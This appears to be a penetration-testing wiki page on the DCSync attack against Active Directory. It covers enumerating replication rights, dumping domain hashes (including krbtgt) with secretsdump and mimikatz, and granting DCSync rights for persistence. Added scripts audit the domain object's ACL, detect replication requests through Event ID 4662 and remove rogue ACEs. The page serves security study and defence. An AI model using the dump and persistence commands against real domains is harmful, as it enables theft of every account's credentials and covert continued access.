# DC Synchronization

The DCSync attack simulates the behavior of a Domain Controller and asks other Domain Controllers to replicate information using the Directory Replication Service Remote Protocol (MS-DRSR). Because MS-DRSR is a valid and necessary function of Active Directory, it cannot be turned off or disabled.\
By default only **Domain Admins, Enterprise Admins, Administrators, and Domain Controllers** groups have the required privileges *(Replicating Directory Changes, Replicating Directory Changes All and Replicating Directory Changes in Filtered Set)*.

## Enumeration

Use **PowerView** (a [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) script that exists in two versions: [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) to enumerate the principals that hold the required replication rights on the domain object.

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-ObjectACL "DC=security,DC=local" -ResolveGUIDs | ? {($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ObjectAceType -match 'Replication-Get')}
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{($_.IdentityReference -match "<USER>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}
```

{% endcode %}

We can take the individual SIDs and resolve them to the related User Principal Names (UPNs).

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -Identity "dc=security,dc=local" -ResolveGUIDs | ? {$_.SecurityIdentifier -match "<SID>"}
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
wmic useraccount get name,sid
```

{% endcode %}
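The same audit can be run without PowerView, using only the RSAT ActiveDirectory module, which is what a defender reviewing the domain object's DACL would typically have available. The following script is an added example, not part of the original page: it reads the ACL of the domain naming context through the `AD:` drive, keeps the ACEs that grant any of the three replication extended rights (or GenericAll / all-extended-rights / WriteDacl, which imply or allow granting them), and flags principals outside a baseline list. The baseline is built from the default groups named above plus the built-in identities normally present; adjust it to your environment.

```powershell
# Added example (not from the original page): audit DCSync-capable principals on the
# domain object with the RSAT ActiveDirectory module. Run on a domain-joined host.
Import-Module ActiveDirectory

# Extended-right GUIDs from the AD schema that together allow DCSync.
$ReplicationRights = @{
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes'
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2' = 'DS-Replication-Get-Changes-All'
    '89e95b76-444d-4c62-991a-0facbeda640c' = 'DS-Replication-Get-Changes-In-Filtered-Set'
}

# Assumed baseline: the default holders named on this page plus built-in identities.
# Anything not in this list deserves a closer look.
$ExpectedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS',
    'BUILTIN\Administrators',
    "$env:USERDOMAIN\Domain Controllers",
    "$env:USERDOMAIN\Domain Admins",
    "$env:USERDOMAIN\Enterprise Admins"
)

$AdRights  = [System.DirectoryServices.ActiveDirectoryRights]
$DomainDN  = (Get-ADDomain).DistinguishedName
$acl       = Get-Acl -Path "AD:\$DomainDN"

$findings = foreach ($ace in $acl.Access) {
    if ($ace.AccessControlType -ne 'Allow') { continue }
    $guid  = $ace.ObjectType.ToString()
    $right = $null

    if ($ReplicationRights.ContainsKey($guid)) {
        $right = $ReplicationRights[$guid]
    } elseif ($ace.ActiveDirectoryRights.HasFlag($AdRights::GenericAll)) {
        $right = 'GenericAll (implies all replication rights)'
    } elseif ($ace.ActiveDirectoryRights.HasFlag($AdRights::ExtendedRight) -and
              $guid -eq [guid]::Empty.ToString()) {
        $right = 'All extended rights (implies all replication rights)'
    } elseif ($ace.ActiveDirectoryRights.HasFlag($AdRights::WriteDacl)) {
        $right = 'WriteDacl (can grant itself replication rights)'
    }
    if (-not $right) { continue }

    [pscustomobject]@{
        Principal = $ace.IdentityReference.Value
        Right     = $right
        Inherited = $ace.IsInherited
        Expected  = $ExpectedPrincipals -contains $ace.IdentityReference.Value
    }
}

# Full picture first, then only the unexpected holders.
$findings | Sort-Object Expected, Principal | Format-Table -AutoSize
$findings | Where-Object { -not $_.Expected }
```

ACEs are granted to groups as often as to users, so follow up any unexpected group with `Get-ADGroupMember -Recursive` to see who actually inherits the right; the script reports the trustee as written in the DACL, not its membership.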

## Attack

{% tabs %}
{% tab title="Remotely" %}
**Linux**

With [impacket-secretsdump](https://github.com/fortra/impacket/blob/master/examples/secretsdump.py).

{% code overflow="wrap" %}

```bash
secretsdump.py -just-dc <Domain>/<User>:<Password>@<IP> -outputfile dcsync_hashes
```

{% endcode %}

{% code overflow="wrap" %}

```bash
[-just-dc-user <USERNAME>]  # Dump only this user's secrets
[-hashes <LM:NTLM_HASH>]    # Authenticate with an NTLM hash instead of a password
[-pwd-last-set]             # Show when each account's password was last changed
[-just-dc-ntlm]             # Dump only NTLM hashes (skip Kerberos keys)
[-user-status]              # Show whether each account is disabled
[-history]                  # Also dump password history, useful for offline cracking
```

{% endcode %}
{% endtab %}

{% tab title="Locally" %}
**Windows**

With [mimikatz](https://github.com/gentilkiwi/mimikatz)

{% code overflow="wrap" %}

```powershell
lsadump::dcsync /domain:<Domain> /user:<User-To-Dump>
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
lsadump::dcsync /user:krbtgt
lsadump::dcsync /domain:security.local /user:new_admin
lsadump::dcsync /user:security\krbtgt
```

{% endcode %}
{% endtab %}
{% endtabs %}
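On the Domain Controller side, a replication request from either of the tools above shows up as Security Event ID 4662 (an operation was performed on an object) with the replication extended-right GUIDs listed in the event's `Properties` field. The script below is an added detection example, not part of the original page: it pulls the last 24 hours of 4662 events, keeps those whose `Properties` contain a replication GUID, and drops requests from accounts that replicate legitimately (computer accounts, whose names end in `$`, and Azure AD Connect's `MSOL_*` service account). It assumes it runs on a DC where "Audit Directory Service Access" is enabled and the domain object's SACL audits the replication rights; without that, no 4662 events are written for these operations.

```powershell
# Added example (not from the original page): find DCSync-style replication requests
# in a DC's Security log. Requires Directory Service Access auditing on the DC.
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'  # DS-Replication-Get-Changes-In-Filtered-Set
)
$GuidPattern = $ReplicationGuids -join '|'

# Assumed allow-list: DC computer accounts and the Azure AD Connect sync account.
# Extend it with any other replication service accounts you know of.
$LegitimatePattern = '\$$|^MSOL_'

$events = Get-WinEvent -FilterHashtable @{
    LogName   = 'Security'
    Id        = 4662
    StartTime = (Get-Date).AddHours(-24)
} -ErrorAction SilentlyContinue

$suspicious = foreach ($e in $events) {
    # Read the named EventData fields from the event XML.
    $xml  = [xml]$e.ToXml()
    $data = @{}
    foreach ($d in $xml.Event.EventData.Data) { $data[$d.Name] = $d.'#text' }

    if ($data['Properties'] -notmatch $GuidPattern) { continue }
    if ($data['SubjectUserName'] -match $LegitimatePattern) { continue }

    [pscustomobject]@{
        Time    = $e.TimeCreated
        Account = "$($data['SubjectDomainName'])\$($data['SubjectUserName'])"
        LogonId = $data['SubjectLogonId']
        Object  = $data['ObjectName']
        Rights  = ($ReplicationGuids | Where-Object { $data['Properties'] -match $_ }) -join ','
    }
}

$suspicious | Sort-Object Time | Format-Table -AutoSize
```

4662 is a noisy event, so the filter on `Properties` is what makes this practical; in a SIEM the same logic is a rule on EventID 4662, the three GUIDs, and a subject name that is neither a computer account nor a known sync account. A non-DC account in the output is a strong signal, since only DCs need to replicate.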

## Persistence

**PowerView** (a [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) script that exists in two versions: [Old](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1) and [New](https://github.com/BC-SECURITY/Empire/blob/main/empire/server/data/module_source/situational_awareness/network/powerview.ps1)) can be used to grant a user object the DCSync rights for future exploitation.

{% code overflow="wrap" %}

```powershell
Add-ObjectACL -TargetDistinguishedName "DC=Security,DC=local" -PrincipalSamAccountName 'user' -Rights DCSync
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
Add-ObjectACL -PrincipalIdentity <USER> -Rights DCSync
```

{% endcode %}

Verify that the ACE has been added:

{% code overflow="wrap" %}

```powershell
Get-ObjectAcl -DistinguishedName "DC=Security,DC=local" -ResolveGUIDs | ?{$_.IdentityReference -match "user"}
```

{% endcode %}
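Once such an ACE is found on a principal that should not have it, the remediation is to remove exactly those ACEs from the domain object. The following is an added example, not part of the original page: using the RSAT ActiveDirectory module it resolves the principal's SID, selects the explicit (non-inherited) ACEs on the domain object that grant one of the three replication rights to that SID, removes them, and writes the DACL back. The principal name `user` is assumed, matching the page's example; run it with rights to modify the domain object's DACL.

```powershell
# Added example (not from the original page): remove replication (DCSync) ACEs that
# were granted to a specific principal on the domain object.
Import-Module ActiveDirectory

$Principal = 'user'   # assumed sAMAccountName of the principal to clean up
$ReplicationGuids = @(
    '1131f6aa-9c07-11d1-f79f-00c04fc2dcd2', # DS-Replication-Get-Changes
    '1131f6ad-9c07-11d1-f79f-00c04fc2dcd2', # DS-Replication-Get-Changes-All
    '89e95b76-444d-4c62-991a-0facbeda640c'  # DS-Replication-Get-Changes-In-Filtered-Set
)

$DomainDN = (Get-ADDomain).DistinguishedName
$sid = (Get-ADObject -Filter "sAMAccountName -eq '$Principal'" -Properties objectSid).objectSid
if (-not $sid) { throw "Principal '$Principal' not found" }

# ACE trustees come back as NTAccount names; compare on SID so renames cannot fool us.
function Get-AceSid($ace) {
    try { $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]) }
    catch { $null }
}

$acl = Get-Acl -Path "AD:\$DomainDN"
$toRemove = @($acl.Access | Where-Object {
    -not $_.IsInherited -and
    (Get-AceSid $_) -eq $sid -and
    $ReplicationGuids -contains $_.ObjectType.ToString()
})

if ($toRemove.Count -eq 0) {
    Write-Host "No explicit replication ACEs for $Principal on $DomainDN"
    return
}

foreach ($ace in $toRemove) {
    Write-Host "Removing $($ace.ObjectType) granted to $($ace.IdentityReference)"
    [void]$acl.RemoveAccessRule($ace)
}
Set-Acl -Path "AD:\$DomainDN" -AclObject $acl

# Re-read the DACL to confirm nothing replication-related is left for this SID.
$left = @((Get-Acl -Path "AD:\$DomainDN").Access | Where-Object {
    (Get-AceSid $_) -eq $sid -and $ReplicationGuids -contains $_.ObjectType.ToString()
})
Write-Host "Remaining replication ACEs for ${Principal}: $($left.Count)"
```

Removing the ACE only stops further replication requests; any secrets already pulled with it (including the krbtgt hash) stay valid until the affected passwords are rotated, so treat the finding as a credential compromise and not just a permissions cleanup.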
